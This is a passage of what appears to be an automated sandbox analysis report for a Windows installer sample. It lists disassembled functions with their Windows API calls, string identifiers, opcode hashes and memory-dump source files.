                                                            • Instruction Fuzzy Hash: 90A10A34A00109DFCB00EB99D985EEEB7F5AF88304F1580B6E404AB362D738AE45DF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /:*?"<>|
                                                            • API String ID: 0-4078764451
                                                            • Opcode ID: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                            • Instruction ID: b706238f5af82f8a54f925a22e06db4ee79b372672e861a4edd763b161806009
                                                            • Opcode Fuzzy Hash: daa5e4ec58dfd3a4f8b67407405db92af73f638a584e66193a323fc2660a566c
                                                            • Instruction Fuzzy Hash: 6F7197B0B44244AADB20E766DCC2BEE77A19F41704F108167F5807B392E7B99D45878E
                                                            APIs
                                                            • SetActiveWindow.USER32(?), ref: 004820FE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ActiveWindow
                                                            • String ID: InitializeWizard
                                                            • API String ID: 2558294473-2356795471
                                                            • Opcode ID: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                            • Instruction ID: b8891c381381d1a0014b65a4ce29d1dfbbdf9d421e77ac889de6892087eb3363
                                                            • Opcode Fuzzy Hash: 4cb1695e49b1b07e3586b425a713be07569947560fbf0fba233168fdeef3d44e
                                                            • Instruction Fuzzy Hash: BE118234205204DFD711EBA5FE96B2977E4EB55314F20143BE5008B3A1DA796C50CB6D
                                                            APIs
                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C472,00000000,0047C5AC), ref: 0047C271
                                                            Strings
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C241
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 47109696-1019749484
                                                            • Opcode ID: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                            • Instruction ID: 70811ca8e083c9a3dbfae153db117623eb743e792d78c4ccda021ebaf15ccddc
                                                            • Opcode Fuzzy Hash: 6e2d5090e95b4c6fabdd9168d7cad944b3593745ae6ad0b3bb6d2af319e0c910
                                                            • Instruction Fuzzy Hash: 8EF08931B0411467DA00A5DA5C82B9E56DD8B55758F20407FF508EB253D9B99D02036C
                                                            APIs
                                                            • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                            Strings
                                                            • Inno Setup: Setup Version, xrefs: 0046F10D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID: Inno Setup: Setup Version
                                                            • API String ID: 3702945584-4166306022
                                                            • Opcode ID: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                            • Instruction ID: 253732d940e31991125f8b939195b5ca02eb4333684dc2ddbbcc15e62aa31341
                                                            • Opcode Fuzzy Hash: 734ac0f1c1098741eb0e60cbf617dbc9041c5452899e61f021b18629f5aca0fc
                                                            • Instruction Fuzzy Hash: 3BE06D713012047FD710AA6B9C85F5BBADDDF993A5F10403AB908DB392D578DD4081A8
                                                            APIs
                                                            • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID: NoModify
                                                            • API String ID: 3702945584-1699962838
                                                            • Opcode ID: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                            • Instruction ID: dfbc78ba79a393f528aadc4bccb3a1e1d52346a2df28baf9fde3d1272b39f611
                                                            • Opcode Fuzzy Hash: 14b653d2795b3180ab09acf432715bdcca8a399851f75d04a8bb0bb30e96b91c
                                                            • Instruction Fuzzy Hash: D8E04FB4604304BFEB04DB55DD4AF6B77ECDB48750F10415ABA04DB281E674EE00C668
                                                            APIs
                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047E25F,?,-0000001A,004800D8,-00000010,?,00000004,0000001B,00000000,00480425,?,0045DECC), ref: 0047DFF6
                                                              • Part of subcall function 0042E32C: 73E9A570.USER32(00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000,00480D8E,?,?,?,?,?,004986AB), ref: 0042E33B
                                                              • Part of subcall function 0042E32C: EnumFontsA.GDI32(?,00000000,0042E318,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E366
                                                              • Part of subcall function 0042E32C: 73E9A480.USER32(00000000,?,0042E38B,00000000,00000000,0042E384,?,00000000,00000000,0048048C,?,?,00000001,00000000,00000002,00000000), ref: 0042E37E
                                                            • SendNotifyMessageA.USER32(000103F8,00000496,00002711,-00000001), ref: 0047E1C6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A480A570EnumFontsMessageNotifySend
                                                            • String ID:
                                                            • API String ID: 2685184028-0
                                                            • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                            • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                            • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                            • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                            APIs
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID:
                                                            • API String ID: 3660427363-0
                                                            • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                            • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                            • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                            • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                            APIs
                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                            • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum
                                                            • String ID:
                                                            • API String ID: 2818636725-0
                                                            • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                            • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                            • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                            • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 2919029540-0
                                                            • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                            • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                            • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                            • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                            APIs
                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: Resource$FindFree
                                                            • String ID:
                                                            • API String ID: 4097029671-0
                                                            • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                            • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                            • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                            • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                            • 73EA5940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: A5940CurrentThread
                                                            • String ID:
                                                            • API String ID: 2589350566-0
                                                            • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                            • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                            • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                            • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                            APIs
                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastMove
                                                            • String ID:
                                                            • API String ID: 55378915-0
                                                            • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                            • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                            • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                            • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                            APIs
                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                            • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                            • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                            • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                            APIs
                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: CursorLoad
                                                            • String ID:
                                                            • API String ID: 3238433803-0
                                                            • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                            • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                            • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                            • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                            • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                            • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                            • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                            APIs
                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                            • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ClassInfo
                                                            • String ID:
                                                            • API String ID: 3534257612-0
                                                            • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                            • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
                                                            • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                            • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
                                                              • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384662105.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_400000_eCh9R4T214.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                            • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
                                                            • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                            • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                            APIs
                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3384341389.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.3384304827.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384494472.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384583192.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000001.00000002.3384623423.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
